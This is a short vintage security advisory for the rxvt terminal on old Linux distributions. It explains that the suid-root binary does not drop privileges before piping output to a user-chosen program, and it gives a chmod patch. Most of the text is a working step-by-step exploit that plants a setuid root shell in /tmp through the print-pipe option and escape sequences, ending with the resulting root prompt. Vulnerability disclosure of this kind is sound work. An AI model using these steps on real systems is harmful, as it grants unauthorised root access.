Program: rxvt
Affected Operating Systems: Linux Slackware 3.0, RedHat 2.1, others with
                            rxvt suid root (and compiled with PRINT_PIPE)
              Requirements: account on system, X server
           Temporary Patch: chmod -s /usr/X11R6/bin/rxvt
       Security Compromise: root
                    Author: Dave M. (davem@cmu.edu)
                  Synopsis: rxvt fails to give up root privileges before
                            opening a pipe to a program that can be specified
                            by the user.


Exploit:
1.  Set DISPLAY environment variable if necessary so you can use x clients.
2.  In user shell:
    $ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
    $ chmod +x /tmp/rxbug
    $ rxvt -print-pipe /tmp/rxbug
3.  In rxvt xclient:
    $ cat
      ESC[5i
      ESC[4i
    (The client will close at this point with a broken pipe)
4.  $ /tmp/rxsh
    # whoami
    root
    #